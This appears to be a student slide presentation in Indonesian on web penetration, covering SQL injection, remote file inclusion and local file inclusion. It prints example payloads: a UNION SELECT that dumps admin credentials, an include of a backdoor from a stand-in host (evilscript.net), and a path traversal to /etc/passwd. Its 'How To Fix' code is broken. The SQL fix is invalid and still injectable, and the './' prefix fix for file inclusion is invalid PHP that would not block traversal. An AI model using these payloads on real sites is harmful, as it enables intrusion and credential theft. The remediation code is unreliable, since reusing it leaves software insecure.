Upload
dsky-mc
View
106
Download
1
Embed Size (px)
Citation preview
OLEH
SAMUEL TANGON
XII TKJ 6
PENETRASI WEBSITE
Nama : Samuel Tangon
TTL : Manado, 17 Mei 1994
Kelas : XII TKJ 6
Sekolah : SMKN 3 Manado
Hobby : Internet Hacking & Games
Biodata
Penetrasi Website ( Web Hacking ) Adalah Suatu Tindakan Untuk Mencari Vulnerable atau Celah
Keamanan Yang Ada Di Dalam Suatu Website.
Pengertian Penetrasi Website
SQL Injection ( Structured Query Language )
RFI ( Remote File Inclusion )
LFI ( Local File Inclusion )
Tipe-Tipe Penetrasi Website
SQL Injection adalah suatu tindakan memanipulasi perintah SQL Database Yang Berada Di Dalam Server dengan memanfaatkan Celah dari Aplikasi Website.
SQL Injection
SQL Injection memungkinkan penyerang dapat mengambil data-data yang ada di dalam database SQL dari Korban. Entah untuk keperluan legal maupun ilegal.
Bahaya SQL Injection
Contoh Website Misalnya : http://localhost/index.php?p=1Jika dalam file index.php terkena vuln, kita
dapat mencari file username dan password yang berada di database SQL dengan mengubah link berikut menjadi,
http://localhost/index.php?p=1+union+select+0,1,2,concat(username,0x3a,password),4+from+admins--
Contoh SQL Injection
RFI adalah salah 1 teknik hacking yang memungkinkan penyerang dapat meng-include kan file yang ada di luar server.
RFI ( Remote File Inclusion )
Bug RFI Sangat berbahaya karena penyerang / attacker dapat langsung meng-includekan file yang berupa backdoor / pintu belakang dari website.
Bahaya RFI
Contoh Website Misalnya :http://www.7crew.co.cc/guestbook.php?page=welcome
Penyerang dapat langsung meng-include / memasukan file backdoor / pintu belakang di dalam website, menjadi :
http://www.7crew.co.cc/guestbook.php?page=http://evilscript.net/backdoor.php
Dengan ini Penyerang dengan mudahnya memasukan file “backdoor.php” ke dalam website korban.
Contoh Penggunaan RFI
Pengertian LFI hampir sama dengan RFI, tapi jika RFI memanggil file di luar server, LFI adalah suatu teknik hacking yang memungkinkan penyerang dapat memanggil file-file yang ada di website atau server korban.
LFI ( Local File Inclusion )
LFI sebenarnya tidak terlalu berbahaya, karena penyerang hanya bisa meng-include file yang ada di dalam server, melalui Link Website.
Bahaya LFI
Contoh Website Misalnyahttp://www.anginribut.com/index.php?var=ribut.php‘Jelas di link ini, file “ribut.php” adalah file yg
di include dari server.”
Jika kita rubah linknya menjadihttp://www.anginribut.com/index.php?var=../../../../../../../etc/
passwd‘Di link ini file ‘passwd’ dalam server linux di-
includekan dan tentunya ini berbahaya.
Contoh Penggunaan LFI
Konfigurasi PHP Pada Server pada File php.ini
Harus Mem-validasi Syntax yang kita gunakan.
How To Fix ?
Di Linux, Edit File di /etc/apache/php/php.iniDi Windows, Edit File diC:\xampp\php\php.ini
Beberapa Line di Bawah Menjadi,
allow_url_include = offallow_url_fopen = offmagic_quotes_gpc = on
Konfigurasi Server pada php.ini
Misalnya Dalam File guestbook.php berisi,
<?php
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
Dapat Dilihat Variable “$id” tidak di filter, dengan mudahnya syntax SQL dapat di Injeksi.
Perbaiki dengan menambahkan fungsi “interval” atau “int” di syntax. Menjadi,
<?php
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id=(int)$_GET['id']’”;
?>
Validasi Syntax SQL
Misalnya Dalam File bukutamu.php berisi,
<?php
$pagina=$_GET['pagina'];
include $pagina;
?>
Dapat ditambahkan “./” sebelum variable $_GET agar setiap file yang di include di luar server, akan ditambahkan “./” pada setiap link. Ubah Menjadi,
<?php
$pagina=“./”$_GET[‘pagina’];
include $pagina;
?>
Validasi Syntax RFI
Misalnya dalam File index.php berisi,
<?php
$pagina=$_GET['pagina'];
include '/pages/'.$pagina;
?>
Sama Seperti pencegahan Bug RFI, ditambahkan variable “./” sebelum variable $_GET . Ubah Menjadi,
<?php
$pagina=“./”$_GET[‘pagina’];
include ‘/pages/’.$pagina;
?>
Validasi Syntax LFI
Dari Materi tersebut dapat ditarik kesimpulan,
1. Perlu Diperhatikan Konfigurasi server yang digunakan.
2. Untuk setiap Programmer, perlu diperhatikan setiap syntax yang digunakan agar setiap script tidak ada yang terkena Bug.
Kesimpulan
Sumber :
ManadoCoding Community : http://www.manadocoding.org
7Crew Community : http://7crew.co.cc
Inj3ct0r : http://1337db.com
Exploit-DB : http://www.exploit-db.com
Some From Google :P
TERIMA KASIH